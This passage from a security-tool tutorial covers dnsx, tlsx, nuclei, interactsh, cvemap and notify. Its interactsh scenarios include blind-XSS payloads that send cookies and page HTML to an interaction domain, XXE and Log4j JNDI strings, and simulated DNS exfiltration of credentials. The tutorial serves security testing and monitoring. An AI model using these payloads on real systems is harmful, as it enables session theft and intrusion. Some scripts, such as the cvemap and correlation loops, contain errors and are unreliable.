jq -r '.[] | [.host, .a[]] | @csv' "dns_snapshot_$(date -d yesterday +%Y%m%d).json" | sort > yesterday_dns.txt
# Find changes
echo "New DNS records:"
comm -13 yesterday_dns.txt today_dns.txt
echo "Removed DNS records:"
comm -23 yesterday_dns.txt today_dns.txt
fi
# Check for suspicious TXT records
cat critical_domains.txt | dnsx -txt | grep -E "(bitcoin|crypto|ransom)"
Advanced Techniques
Wildcard Detection and Handling
# Test for wildcard DNS
echo "example.com" | dnsx -wildcard
# Generate random subdomains to test wildcards
for i in {1..10}; do
echo "$(openssl rand -hex 8).example.com"
done | dnsx -wildcard
Custom Resolver Configuration
# Use specific resolvers
echo "example.com" | dnsx -resolver 8.8.8.8,1.1.1.1
# Test resolver performance
for resolver in 8.8.8.8 1.1.1.1 9.9.9.9; do
time echo "example.com" | dnsx -resolver $resolver
done
Integration with Other Tools
# DNSx + Naabu for comprehensive enumeration
cat domains.txt | dnsx -a -resp-only | naabu -top-ports 1000
# DNSx + Httpx pipeline
cat domains.txt | dnsx -a -resp-only | httpx -silent
12. TLSx - TLS/SSL Analysis Tool
Overview
TLSx specializes in TLS/SSL data collection, providing insights into certificates, cipher suites, and SSL/TLS configurations.
Installation
go install -v github.com/projectdiscovery/tlsx/cmd/tlsx@latest
Basic Usage
# Basic TLS probe
echo "https://example.com" | tlsx
# Certificate information
echo "https://example.com" | tlsx -cert
# Cipher suite enumeration
echo "https://example.com" | tlsx -cipher
# JSON output
echo "https://example.com" | tlsx -json
Advanced Features
Certificate Analysis
# Certificate details
echo "https://example.com" | tlsx -cert -cert-info
# Certificate chain
echo "https://example.com" | tlsx -cert -chain
# Certificate expiry
echo "https://example.com" | tlsx -cert -expiry
Security Assessment
# Vulnerability scanning
echo "https://example.com" | tlsx -vulns
# Protocol version testing
echo "https://example.com" | tlsx -tls-version
# JARM fingerprinting
echo "https://example.com" | tlsx -jarm
Real-World Scenarios
Scenario 1: Enterprise Certificate Management
# Target: Large corporation
# Objective: Audit SSL/TLS certificates across infrastructure
# Step 1: Discover HTTPS services
cat corporate_domains.txt | httpx -silent | grep '^https://' | tee https_services.txt
# Step 2: Certificate inventory
cat https_services.txt | tlsx -cert -cert-info -json > certificate_inventory.json
# Step 3: Identify expiring certificates
jq -r '.[] | select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' certificate_inventory.json | \
while IFS=, read host expiry; do
expiry_date=$(date -d "$expiry" +%s)
current_date=$(date +%s)
days_until_expiry=$(( (expiry_date - current_date) / 86400 ))
if [ $days_until_expiry -lt 30 ]; then
echo "$host expires in $days_until_expiry days ($expiry)"
fi
done
# Step 4: Certificate authority analysis
jq -r '.[] | .cert_issuer' certificate_inventory.json | sort | uniq -c | sort -nr
Scenario 2: Security Configuration Assessment
# Target: Financial services company
# Objective: Assess TLS security across all services
# TLS version compliance check
cat financial_services.txt | tlsx -tls-version -json | \
jq -r '.[] | select(.tls_version != null) | [.host, .tls_version] | @csv' | \
grep -v "1.2\|1.3" > weak_tls_versions.csv
# Cipher suite security analysis
cat financial_services.txt | tlsx -cipher -json > cipher_analysis.json
jq -r '.[] | select(.cipher != null) | [.host, .cipher] | @csv' cipher_analysis.json | \
grep -E "(RC4|DES|MD5|SHA1)" > weak_ciphers.csv
# Certificate validation issues
cat financial_services.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_error != null) | [.host, .cert_error] | @csv'
# HSTS implementation check
cat financial_services.txt | httpx -response-headers -json | \
jq -r '.[] | select(.headers["strict-transport-security"] == null) | .url' > missing_hsts.txt
Scenario 3: Threat Hunting and Attribution
# Target: Suspicious infrastructure
# Objective: Use TLS fingerprinting for threat attribution
# JARM fingerprinting for infrastructure correlation
cat suspicious_ips.txt | tlsx -jarm -json > jarm_fingerprints.json
# Group by JARM fingerprint
jq -r '.[] | [.jarm, .host] | @csv' jarm_fingerprints.json | \
sort | awk -F, '{print $1}' | uniq -c | sort -nr
# Certificate analysis for infrastructure links
cat suspicious_ips.txt | tlsx -cert -cert-info -json | \
jq -r '.[] | [.host, .cert_issuer, .cert_subject] | @csv' > certificate_attribution.csv
# Identify shared certificates
cut -d, -f2,3 certificate_attribution.csv | sort | uniq -c | sort -nr | head -20
Advanced Techniques
Custom Certificate Validation
# Check for specific certificate authorities
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_issuer | contains("Let'\''s Encrypt")) | .host'
# Wildcard certificate detection
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_subject | contains("*")) | [.host, .cert_subject] | @csv'
Performance and Monitoring
# TLS handshake timing
cat critical_services.txt | tlsx -json | \
jq -r '.[] | [.host, .tls_handshake_time] | @csv'
# Continuous monitoring script
#!/bin/bash
while true; do
DATE=$(date +%Y%m%d_%H%M%S)
cat critical_services.txt | tlsx -cert -expiry -json > "tls_monitor_$DATE.json"
sleep 3600
done
Integration with Security Tools
# TLSx + Nuclei for TLS vulnerability scanning
cat https_services.txt | tlsx -json | \
jq -r '.host' | nuclei -t ssl/
# TLSx + Custom analysis
cat domains.txt | tlsx -cert -json | \
jq -r '.[] | select(.cert_expired == true) | .host' | \
httpx -title -status-code
Detection Tools
13. Nuclei - Vulnerability Scanner
Overview
Nuclei is a fast vulnerability scanner based on YAML templates, capable of scanning for thousands of different security issues.
Installation
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# Update templates
nuclei -update-templates
Basic Usage
# Basic scan
nuclei -u https://example.com
# Scan with specific templates
nuclei -u https://example.com -t cves/
# Scan from file
nuclei -list urls.txt
# Severity filtering
nuclei -u https://example.com -severity high,critical
Template Categories
# CVE scanning
nuclei -u https://example.com -t cves/
# Technology detection
nuclei -u https://example.com -t technologies/
# Misconfiguration detection
nuclei -u https://example.com -t misconfiguration/
# Exposed panels
nuclei -u https://example.com -t exposed-panels/
# Default credentials
nuclei -u https://example.com -t default-logins/
Real-World Scenarios
Scenario 1: Comprehensive Security Assessment
# Target: E-commerce platform
# Objective: Complete vulnerability assessment
# Step 1: Discovery and enumeration
subfinder -d ecommerce.com -silent | httpx -silent > ecommerce_targets.txt
# Step 2: Technology identification
nuclei -list ecommerce_targets.txt -t technologies/ -json > tech_stack.json
# Step 3: CVE scanning based on identified technologies
jq -r '.["template-id"]' tech_stack.json | sort -u > detected_techs.txt
nuclei -list ecommerce_targets.txt -t cves/ -tags "$(tr '\n' ',' < detected_techs.txt)" -json > cve_results.json
# Step 4: Configuration and exposure checks
nuclei -list ecommerce_targets.txt -t exposures/ -t misconfiguration/ -severity medium,high,critical -json > config_issues.json
# Step 5: Generate comprehensive report
jq -r '[.host, .["template-id"], .info.severity, .info.name] | @csv' cve_results.json config_issues.json > vulnerability_report.csv
Scenario 2: Continuous Security Monitoring
# Target: Critical infrastructure
# Objective: 24/7 vulnerability monitoring
#!/bin/bash
# Script: continuous_nuclei_monitor.sh
TARGETS_FILE="critical_assets.txt"
ALERT_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
while true; do
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
# Scan for high/critical vulnerabilities
nuclei -list $TARGETS_FILE -severity high,critical -json -o "scan_$TIMESTAMP.json"
# Check for new vulnerabilities
if [ -s "scan_$TIMESTAMP.json" ]; then
# Send alert
jq -r '.info.name + " - " + .host' "scan_$TIMESTAMP.json" | \
while read vuln; do
curl -X POST -H 'Content-type: application/json' \
--data '{"text":"🚨 Critical Vulnerability Found: '$vuln'"}' \
$ALERT_WEBHOOK
done
fi
sleep 3600 # Wait 1 hour
done
Scenario 3: Supply Chain Security Assessment
# Target: Software vendor and dependencies
# Objective: Assess third-party security risks
# Vendor's main infrastructure
nuclei -u https://vendor.com -t cves/ -t exposures/ -json > vendor_main.json
# Customer-facing applications
cat vendor_customer_portals.txt | nuclei -t default-logins/ -t exposures/ -json > customer_portals.json
# API security assessment
cat vendor_apis.txt | nuclei -t exposures/apis/ -t misconfiguration/ -json > api_security.json
# Development infrastructure
echo -e "dev\ntest\nstaging\nbeta" | while read env; do
echo "https://$env.vendor.com"
done | nuclei -t exposures/ -t misconfiguration/ -json > dev_infrastructure.json
# Consolidate findings (nuclei -json emits one finding per line)
cat vendor_main.json customer_portals.json api_security.json dev_infrastructure.json > complete_vendor_assessment.json
Advanced Template Usage
Custom Template Creation
# custom-login-check.yaml
id: custom-login-check
info:
name: Custom Login Panel Detection
author: security-team
severity: info
tags: panel,login
requests:
- method: GET
path:
- "{{BaseURL}}/admin"
- "{{BaseURL}}/login"
- "{{BaseURL}}/administrator"
matchers-condition: and
matchers:
- type: word
words:
- "login"
- "password"
- "username"
condition: or
- type: status
status:
- 200
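Before adding a custom template to regular scans, it can be syntax-checked and exercised on its own:
# Validate the template, then run it against a single target
nuclei -t custom-login-check.yaml -validate
nuclei -u https://target.com -t custom-login-check.yaml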
Template Filtering and Optimization
# Run only specific template types
nuclei -u https://target.com -type http -severity critical
# Exclude certain templates
nuclei -u https://target.com -exclude-templates cves/2018/
# Custom template directory
nuclei -u https://target.com -t /custom/templates/
# Rate limiting for stealth
nuclei -u https://target.com -rate-limit 10 -bulk-size 5
Advanced Output and Reporting
# Multiple output formats
nuclei -list targets.txt -json-export results.json -markdown-export nuclei-report/
# Custom field extraction
nuclei -list targets.txt -json | jq -r '[.host, .["template-id"], .info.severity, .["matched-at"]] | @csv'
# Integration with external tools
nuclei -list targets.txt -json | jq -r '.host' | sort -u | httpx -title -tech-detect
14. Interactsh - Out-of-Band Interaction Server
Overview
Interactsh is an out-of-band (OOB) interaction gathering server for detecting vulnerabilities that require external interaction.
Installation
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
Basic Usage
# Start interaction client (generates payload URLs and polls the server for hits)
interactsh-client
# Custom server
interactsh-client -server https://custom.interactsh.com
# Poll for interactions
interactsh-client -poll -server https://oast.pro
Self-Hosted Server Setup
# Install server
interactsh-server -domain interactsh.example.com
# With authentication
interactsh-server -domain interactsh.example.com -token secret_token
# HTTPS configuration
interactsh-server -domain interactsh.example.com -cert cert.pem -key key.pem
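Clients then point at the self-hosted instance instead of the public servers:
# Use the self-hosted server (token required if the server was started with one)
interactsh-client -server https://interactsh.example.com -token secret_token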
Real-World Scenarios
Scenario 1: SSRF Detection in Web Applications
# Target: Web application with user input
# Objective: Detect Server-Side Request Forgery
# Start interaction client
interactsh-client -server https://oast.pro -json -o ssrf_interactions.json > interactsh_banner.txt 2>&1 &
INTERACTSH_PID=$!
sleep 5
# Get the generated payload subdomain from the client banner
INTERACTSH_URL=$(grep -oE '[a-z0-9]+\.oast\.pro' interactsh_banner.txt | head -1)
# Test SSRF in various parameters
curl -X POST "https://webapp.com/profile" \
-d "website=http://$INTERACTSH_URL" \
-d "avatar_url=http://$INTERACTSH_URL/avatar.jpg"
curl -X POST "https://webapp.com/import" \
-d "url=http://$INTERACTSH_URL/data.xml"
# Wait for interactions
sleep 60
# Review interactions recorded by the client
cat ssrf_interactions.json
kill $INTERACTSH_PID
Scenario 2: Blind XSS Detection
# Target: Contact forms and user input fields
# Objective: Detect blind XSS vulnerabilities
# Generate XSS payloads with interaction URLs
interactsh-client -server https://oast.pro -json -o xss_interactions.json > interactsh_banner.txt 2>&1 &
sleep 5
INTERACTSH_URL=$(grep -oE '[a-z0-9]+\.oast\.pro' interactsh_banner.txt | head -1)
# XSS payloads
cat > xss_payloads.txt << EOF
<script>fetch('http://$INTERACTSH_URL/xss?cookie='+document.cookie)</script>
<img src="x" onerror="fetch('http://$INTERACTSH_URL/xss?location='+window.location)">
<svg onload="fetch('http://$INTERACTSH_URL/xss?dom='+document.documentElement.outerHTML.substring(0,1000))">
EOF
# Submit payloads to contact forms
while read payload; do
curl -X POST "https://company.com/contact" \
-d "name=Test" \
-d "email=test@test.com" \
-d "message=$payload"
sleep 5
done < xss_payloads.txt
# Review interactions recorded by the client
jq -r 'select(.protocol == "http")' xss_interactions.json
Scenario 3: DNS Exfiltration and Detection
# Target: Corporate network
# Objective: Test data exfiltration capabilities
# Start DNS interaction monitoring
interactsh-client -server https://oast.pro -json -o dns_interactions.json > interactsh_banner.txt 2>&1 &
sleep 5
# Simulate data exfiltration using the client's payload domain
EXFIL_DOMAIN=$(grep -oE '[a-z0-9]+\.oast\.pro' interactsh_banner.txt | head -1)
# Test DNS exfiltration methods
echo "sensitive-data-12345" | xxd -p | tr -d '\n' | \
while read hex; do
nslookup "$hex.$EXFIL_DOMAIN"
done
# Base64 encoded exfiltration
echo "admin:password123" | base64 | tr -d '\n' | \
while read b64; do
nslookup "$b64.$EXFIL_DOMAIN"
done
# Review received DNS queries recorded by the client
jq -c 'select(.protocol == "dns")' dns_interactions.json | \
grep -oE '[a-f0-9]{16,}' | sort -u
Advanced Integration
Nuclei Integration
# Use Interactsh with Nuclei for OOB testing
nuclei -u https://target.com -interactsh-url https://oast.pro -t oob/
# Custom OOB templates
cat > oob-ssrf.yaml << EOF
id: oob-ssrf-test
info:
name: Out-of-band SSRF Test
severity: high
variables:
oob_domain: "{{interactsh-url}}"
requests:
- method: POST
path:
- "{{BaseURL}}/webhook"
body: 'url=http://{{oob_domain}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
EOF
nuclei -u https://target.com -t oob-ssrf.yaml -interactsh-url https://oast.pro
Custom Payloads and Automation
#!/bin/bash
# Script: automated_oob_testing.sh
TARGET_LIST="targets.txt"
INTERACTSH_SERVER="https://oast.pro"
# Start interaction monitoring
interactsh-client -server $INTERACTSH_SERVER -json -o interactions.json > interactsh_banner.txt 2>&1 &
MONITOR_PID=$!
sleep 5
# Capture the unique interaction domain from the client banner
INTERACTION_DOMAIN=$(grep -oE '[a-z0-9]+\.oast\.pro' interactsh_banner.txt | head -1)
# Test various OOB vectors
while read target; do
echo "Testing $target"
# SSRF tests
curl -s "$target/api/fetch" -d "url=http://$INTERACTION_DOMAIN/ssrf" 2>/dev/null
# XML External Entity
curl -s "$target/api/xml" -H "Content-Type: application/xml" \
-d "<?xml version='1.0'?><!DOCTYPE root [<!ENTITY xxe SYSTEM 'http://$INTERACTION_DOMAIN/xxe'>]><root>&xxe;</root>" 2>/dev/null
# Log4j style payloads
curl -s "$target/" -H "User-Agent: \${jndi:ldap://$INTERACTION_DOMAIN/log4j}" 2>/dev/null
sleep 2
done < $TARGET_LIST
# Wait for interactions
sleep 30
# Analyze results
jq -r '[.timestamp, .protocol, .["remote-address"], .["unique-id"]] | @csv' interactions.json
kill $MONITOR_PID
15. CVEMap - CVE Intelligence Tool
Overview
CVEMap provides a structured interface to navigate Common Vulnerabilities and Exposures (CVE) data with advanced filtering and analysis capabilities.
Installation
go install -v github.com/projectdiscovery/cvemap/cmd/cvemap@latest
Basic Usage
# List recent CVEs
cvemap -limit 10
# Search by vendor
cvemap -vendor microsoft
# Search by product
cvemap -product windows
# Filter by severity
cvemap -severity critical
Advanced Filtering
# CVSS score filtering
cvemap -cvss-score ">8.0"
# EPSS score filtering
cvemap -epss-score ">0.5"
# Age-based filtering
cvemap -age 7 # Last 7 days
# Combined filters
cvemap -vendor apache -severity high -age 30
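For scripting, JSON output pairs with jq; a minimal sketch using the same fields as the examples below:
# Critical Apache CVEs from the last 30 days as CSV
cvemap -vendor apache -severity critical -age 30 -limit 50 -json | \
jq -r '.[] | [.cve_id, .cvss_score, .epss_score] | @csv'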
Real-World Scenarios
Scenario 1: Threat Intelligence and Vulnerability Management
# Target: Enterprise security team
# Objective: Daily threat intelligence gathering
#!/bin/bash
# Script: daily_cve_intelligence.sh
DATE=$(date +%Y%m%d)
REPORT_FILE="cve_intelligence_$DATE.txt"
echo "=== Daily CVE Intelligence Report - $DATE ===" > $REPORT_FILE
echo "" >> $REPORT_FILE
# High-priority vendors for the organization
VENDORS=("microsoft" "apache" "nginx" "openssh" "linux")
for vendor in "${VENDORS[@]}"; do
echo "=== $vendor CVEs (Last 7 days) ===" >> $REPORT_FILE
cvemap -vendor "$vendor" -age 7 -severity high,critical -json | \
jq -r '.[] | [.cve_id, .cvss_score, .epss_score, .cve_description] | @csv' >> $REPORT_FILE
echo "" >> $REPORT_FILE
done
# Trending vulnerabilities with high EPSS scores
echo "=== High EPSS Score CVEs (Active Exploitation Likely) ===" >> $REPORT_FILE
cvemap -epss-score ">0.7" -age 30 -json | \
jq -r '.[] | [.cve_id, .epss_score, .cvss_score, .cve_description] | @csv' >> $REPORT_FILE
# Send report to security team
mail -s "Daily CVE Intelligence Report" security-team@company.com < $REPORT_FILE
Scenario 2: Asset-Specific Vulnerability Assessment
# Target: Infrastructure inventory
# Objective: Match CVEs to specific assets
# Extract technology stack from asset inventory
cat asset_inventory.csv | cut -d',' -f3 | sort -u > tech_stack.txt
# Check CVEs for each technology
while read technology; do
echo "=== CVEs for $technology ==="
# Extract vendor and product
vendor=$(echo $technology | cut -d' ' -f1)
product=$(echo $technology | cut -d' ' -f2-)
# Search for relevant CVEs
cvemap -vendor "$vendor" -product "$product" -age 365 -severity medium,high,critical -json | \
jq -r '.[] | [.cve_id, .cvss_score, .cve_description] | @csv' > "${technology}_cves.csv"
# Count critical issues
critical_count=$(jq -r '.[] | select(.cvss_score >= 9.0) | .cve_id' "${technology}_cves.json" 2>/dev/null | wc -l)
echo "Critical CVEs found: $critical_count"
done < tech_stack.txt
Scenario 3: Penetration Testing CVE Research
# Target: Penetration testing engagement
# Objective: Identify exploitable vulnerabilities for discovered services
# Service discovery results from reconnaissance
cat discovered_services.txt | while read service; do
# Parse service information
host=$(echo $service | cut -d',' -f1)
port=$(echo $service | cut -d',' -f2)
service_name=$(echo $service | cut -d',' -f3)
version=$(echo $service | cut -d',' -f4)
echo "Researching CVEs for $service_name $version on $host:$port"
# Search for CVEs with PoC availability
cvemap -product "$service_name" -json | \
jq -r --arg version "$version" '.[] | select(.affected_versions | contains($version)) |
select(.has_poc == true or .exploitdb_id != null) |
[.cve_id, .cvss_score, .exploitdb_id, .cve_description] | @csv' > "${host}_${port}_exploitable_cves.csv"
# Prioritize by exploitability
sort -t',' -k2 -nr "${host}_${port}_exploitable_cves.csv" | head -5
done
# Generate penetration testing target list
find . -name "*_exploitable_cves.csv" -exec cat {} \; | \
sort -t',' -k2 -nr | head -20 > priority_targets.csv
Integration with Security Tools
CVEMap + Nuclei Integration
# Research CVEs for a specific product
cvemap -product "wordpress" -severity high -json > wordpress_cves.json
# Extract CVE IDs
jq -r '.[] | .cve_id' wordpress_cves.json > wordpress_cve_ids.txt
# Scan with Nuclei using CVE-specific templates
cat wordpress_cve_ids.txt | while read cve; do
nuclei -u https://target-wordpress.com -t "cves/$cve" 2>/dev/null
done
Automated Vulnerability Correlation
#!/bin/bash
# Script: correlate_vulnerabilities.sh
TARGET_DOMAIN=$1
# Technology detection
httpx -u "https://$TARGET_DOMAIN" -tech-detect -json > tech_detection.json
# Extract technologies
jq -r '.tech[]?' tech_detection.json | while read tech; do
vendor=$(echo $tech | cut -d'/' -f1)
product=$(echo $tech | cut -d'/' -f2)
# Research recent high-impact CVEs
cvemap -vendor "$vendor" -product "$product" -age 90 -severity high,critical -json > "${tech}_cves.json"
# Check if Nuclei templates exist
template_count=$(find $HOME/nuclei-templates -name "*${cve}*" 2>/dev/null | wc -l)
if [ $template_count -gt 0 ]; then
echo "$tech has $template_count Nuclei templates available"
# Add to priority scan list
echo "$tech" >> priority_scan_targets.txt
fi
done
16. Notify - Multi-Platform Notification Tool
Overview
Notify streams output from security tools to multiple platforms including Slack, Discord, Telegram, and custom webhooks.
Installation
go install -v github.com/projectdiscovery/notify/cmd/notify@latest
Configuration
# ~/.config/notify/provider-config.yaml
slack:
- webhook_url: "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
username: "SecurityBot"
channel: "#security-alerts"
discord:
- webhook_url: "https://discord.com/api/webhooks/YOUR/WEBHOOK"
username: "SecurityBot"
telegram:
- bot_token: "YOUR_BOT_TOKEN"
chat_id: "YOUR_CHAT_ID"
email:
- smtp_server: "smtp.gmail.com"
smtp_port: 587
username: "alerts@company.com"
password: "app_password"
to: ["security-team@company.com"]
custom:
- webhook_url: "https://api.company.com/security-alerts"
headers:
Authorization: "Bearer YOUR_TOKEN"
Basic Usage
# Send to Slack
echo "Security alert: High severity vulnerability found" | notify -provider slack
# Send to multiple providers
echo "Critical finding detected" | notify -provider slack,discord,email
# Pipe from other tools
nuclei -u https://target.com -severity critical | notify -provider slack
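By default notify sends one message per input line; the -bulk flag sends the whole input as a single message, which suits report-style output:
# Send an entire scan summary as one message instead of line-by-line
nuclei -list targets.txt -severity high,critical -o findings.txt
cat findings.txt | notify -provider slack -bulk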
Real-World Scenarios
Scenario 1: Real-Time Security Monitoring
# Target: Production infrastructure
# Objective: Immediate alerting for critical findings
#!/bin/bash
# Script: realtime_security_monitor.sh
TARGETS_FILE="production_assets.txt"
SLACK_CHANNEL="#security-incidents"
# Continuous monitoring loop
while true; do
TIMESTAMP=$(date '+%Y-%m-%d %H:%M:%S')
# High-severity vulnerability scanning
nuclei -list $TARGETS_FILE -severity critical -json | \
while read -r result; do
CVE=$(echo "$result" | jq -r '.["template-id"]')
HOST=$(echo "$result" | jq -r '.host')
SEVERITY=$(echo "$result" | jq -r '.info.severity')
NAME=$(echo "$result" | jq -r '.info.name')
# Format alert message
ALERT="🚨 *CRITICAL VULNERABILITY DETECTED* 🚨
*Time:* $TIMESTAMP
*Target:* $HOST
*Vulnerability:* $NAME
*Template:* $CVE
*Severity:* $SEVERITY
*Action Required:* Immediate investigation and remediation"
# Send to multiple channels
echo "$ALERT" | notify -provider slack -slack-channel "$SLACK_CHANNEL"
echo "$ALERT" | notify -provider discord
echo "$ALERT" | notify -provider email
# Log to file
echo "$TIMESTAMP,$HOST,$CVE,$SEVERITY,$NAME" >> critical_vulnerabilities.log
done
# Check for new exposed services
naabu -list $TARGETS_FILE -top-ports 100 -json | \
jq -r 'select(.port != null) | [.host, .port] | @csv' | \
while IFS=, read host port; do
# Check if this is a new service
if ! grep -q "$host:$port" known_services.txt; then
echo "$host:$port" >> known_services.txt
ALERT="🔍 *NEW SERVICE DETECTED* 🔍
*Host:* $host
*Port:* $port
*Time:* $TIMESTAMP
*Action:* Security assessment required"
echo "$ALERT" | notify -provider slack -slack-channel "#infrastructure-changes"
fi
done
sleep 300 # Wait 5 minutes
done
Scenario 2: Penetration Testing Workflow Integration
# Target: Penetration testing engagement
# Objective: Streamlined reporting and team coordination
#!/bin/bash
# Script: pentest_workflow.sh
TARGET_DOMAIN=$1
ENGAGEMENT_ID=$2
TEAM_CHANNEL="#pentest-${ENGAGEMENT_ID}"
# Initialize engagement
INIT_MESSAGE="🎯 *PENETRATION TEST INITIATED* 🎯
*Target:* $TARGET_DOMAIN
*Engagement ID:* $ENGAGEMENT_ID
*Start Time:* $(date)
*Team:* Penetration Testing Team"
echo "$INIT_MESSAGE" | notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 1: Reconnaissance
echo "📡 Starting reconnaissance phase..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
subfinder -d "$TARGET_DOMAIN" -silent | \
tee subdomains.txt | \
wc -l | \
xargs -I {} echo "Found {} subdomains for $TARGET_DOMAIN" | \
notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 2: Service discovery
echo "🔍 Starting service discovery..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
cat subdomains.txt | \
httpx -silent | \
tee live_hosts.txt | \
wc -l | \
xargs -I {} echo "Identified {} live web services" | \
notify -provider slack -slack-channel "$TEAM_CHANNEL"
# Phase 3: Vulnerability scanning
echo "🛡️ Starting vulnerability assessment..." | notify -provider slack -slack-channel "$TEAM_CHANNEL"
nuclei -list live_hosts.txt -severity medium,high,critical -json | tee nuclei_results.json | \
while read -r vuln; do
TEMPLATE=$(echo "$vuln" | jq -r '.["template-id"]')
HOST=$(echo "$vuln" | jq -r '.host')
SEVERITY=$(echo "$vuln" | jq -r '.info.severity')
NAME=$(echo "$vuln" | jq -r '.info.name')
VULN_ALERT="🔓 *VULNERABILITY FOUND*
*Host:* $HOST
*Issue:* $NAME
*Severity:* $SEVERITY
*Template:* $TEMPLATE"
echo "$VULN_ALERT" | notify -provider slack -slack-channel "$TEAM_CHANNEL"
done
# Generate summary report
TOTAL_HOSTS=$(cat live_hosts.txt | wc -l)
CRITICAL_VULNS=$(grep '"severity":"critical"' nuclei_results.json | wc -l)
HIGH_VULNS=$(grep '"severity":"high"' nuclei_results.json | wc -l)
SUMMARY="📊 *PENETRATION TEST SUMMARY*
*Target:* $TARGET_DOMAIN
*Total Hosts:* $TOTAL_HOSTS
*Critical Vulnerabilities:* $CRITICAL_VULNS
*High Vulnerabilities:* $HIGH_VULNS
*Completion Time:* $(date)"
echo "$SUMMARY" | notify -provider slack,email -slack-channel "$TEAM_CHANNEL"
Scenario 3: Bug Bounty Automation
# Target: Bug bounty program
# Objective: Automated discovery and alerting
#!/bin/bash
# Script: bug_bounty_automation.sh
PROGRAM_NAME=$1
SCOPE_FILE="$PROGRAM_NAME.scope"
DISCORD_WEBHOOK="https://discord.com/api/webhooks/YOUR/WEBHOOK"
# Monitor for new assets
while true; do
# Asset discovery
cat "$SCOPE_FILE" | while read domain; do
subfinder -d "$domain" -silent | \
comm -13 "known_assets_$domain.txt" - > "new_assets_$domain.txt"
if [ -s "new_assets_$domain.txt" ]; then
NEW_COUNT=$(cat "new_assets_$domain.txt" | wc -l)
DISCOVERY_ALERT="🆕 *NEW ASSETS DISCOVERED* 🆕
*Program:* $PROGRAM_NAME
*Domain:* $domain
*New Assets:* $NEW_COUNT
*Assets:*
\`\`\`
$(cat "new_assets_$domain.txt")
\`\`\`"
echo "$DISCOVERY_ALERT" | notify -provider discord
# Quick vulnerability scan on new assets
cat "new_assets_$domain.txt" | \
httpx -silent | \
nuclei -t exposures/ -severity medium,high,critical | \
notify -provider discord -discord-username "BugBountyBot"
# Update known assets
cat "new_assets_$domain.txt" >> "known_assets_$domain.txt"
sort -u "known_assets_$domain.txt" -o "known_assets_$domain.txt"
fi
done
sleep 3600 # Check every hour
done
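The comm comparison above expects a sorted known_assets baseline per scope domain; pre-seeding those files once before starting the monitor keeps the first cycle from alerting on every asset that already exists. A minimal sketch using the same scope file:
# One-time baseline seeding, run once before launching bug_bounty_automation.sh
cat "$SCOPE_FILE" | while read domain; do
subfinder -d "$domain" -silent | sort -u > "known_assets_$domain.txt"
done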
Advanced Integration Patterns
Custom Webhook Integration
# Custom API integration for ticketing systems
nuclei -u https://target.com -severity high,critical -json | \
jq -r '[.host, .["template-id"], .info.severity, .info.name] | @csv' | \
while IFS=, read host template severity name; do
# Create JIRA ticket
curl -X POST "https://company.atlassian.net/rest/api/2/issue" \
-H "Content-Type: application/json" \
-u "user@company.com:api_token" \
-d "{
\"fields\": {
\"project\": {\"key\": \"SEC\"},
\"summary\": \"$severity: $name\",
\"description\": \"Host: $host\\nTemplate: $template\",
\"issuetype\": {\"name\": \"Bug\"}
}
}"
done
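Interpolating finding details straight into the JSON body breaks as soon as a name or description contains quotes; a safer variation of the same ticket-creation flow (the JIRA endpoint and field values are the same illustrative placeholders as above) builds each payload with jq so values are escaped:
# Build each JIRA payload with jq so special characters in findings are escaped correctly
nuclei -u https://target.com -severity high,critical -json | \
while read -r finding; do
PAYLOAD=$(echo "$finding" | jq '{fields: {project: {key: "SEC"}, summary: (.info.severity + ": " + .info.name), description: ("Host: " + .host + "\nTemplate: " + .["template-id"]), issuetype: {name: "Bug"}}}')
curl -s -X POST "https://company.atlassian.net/rest/api/2/issue" \
-H "Content-Type: application/json" \
-u "user@company.com:api_token" \
-d "$PAYLOAD"
done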
Multi-Stage Notification Workflows
# Escalation workflow based on severity
echo "Critical vulnerability found" | \
notify -provider slack -slack-channel "#security-team" && \
notify -provider email -email-to "security-manager@company.com" && \
notify -provider custom -webhook-url "https://api.pagerduty.com/incidents"
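For per-finding routing rather than a single escalation chain, a small wrapper can read the nuclei JSONL stream and pick a channel by severity; a hedged sketch (the input file and channel names are placeholders):
# Route each nuclei finding to a Slack channel based on its severity
nuclei -list live_hosts.txt -severity low,medium,high,critical -json | \
while read -r finding; do
SEVERITY=$(echo "$finding" | jq -r '.info.severity')
case "$SEVERITY" in
critical) CHANNEL="#incidents" ;;
high) CHANNEL="#security-team" ;;
*) CHANNEL="#security-digest" ;;
esac
echo "$finding" | jq -r '"[" + .info.severity + "] " + .info.name + " on " + .host' | \
notify -provider slack -slack-channel "$CHANNEL"
done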
Utility Tools
17. PDTM - ProjectDiscovery Tool Manager
Overview
PDTM (ProjectDiscovery Tool Manager) simplifies the installation and management of all ProjectDiscovery tools.
Installation
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
Basic Usage
# List available tools
pdtm list
# Install all tools
pdtm install-all
# Install specific tool
pdtm install nuclei
# Update all tools
pdtm update-all
# Remove tool
pdtm remove httpx
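PDTM installs binaries into its own directory rather than GOPATH; if freshly installed tools are not found, add that directory to PATH. A minimal sketch, assuming the default location of $HOME/.pdtm/go/bin (check pdtm's own output if yours differs):
# Make pdtm-managed binaries available in the current shell (persist this in ~/.bashrc or ~/.zshrc)
export PATH="$PATH:$HOME/.pdtm/go/bin"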
Real-World Scenarios
Scenario 1: Security Team Workstation Setup
#!/bin/bash
# Script: security_workstation_setup.sh
echo "Setting up ProjectDiscovery security toolkit..."
# Install PDTM
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
# Install all ProjectDiscovery tools
pdtm install-all
# Verify installations
pdtm list | grep -E "(nuclei|subfinder|httpx|naabu|katana)"
# Update Nuclei templates
nuclei -update-templates
# Create directory structure
mkdir -p ~/security/{wordlists,results,scripts,reports}
# Download common wordlists
cd ~/security/wordlists
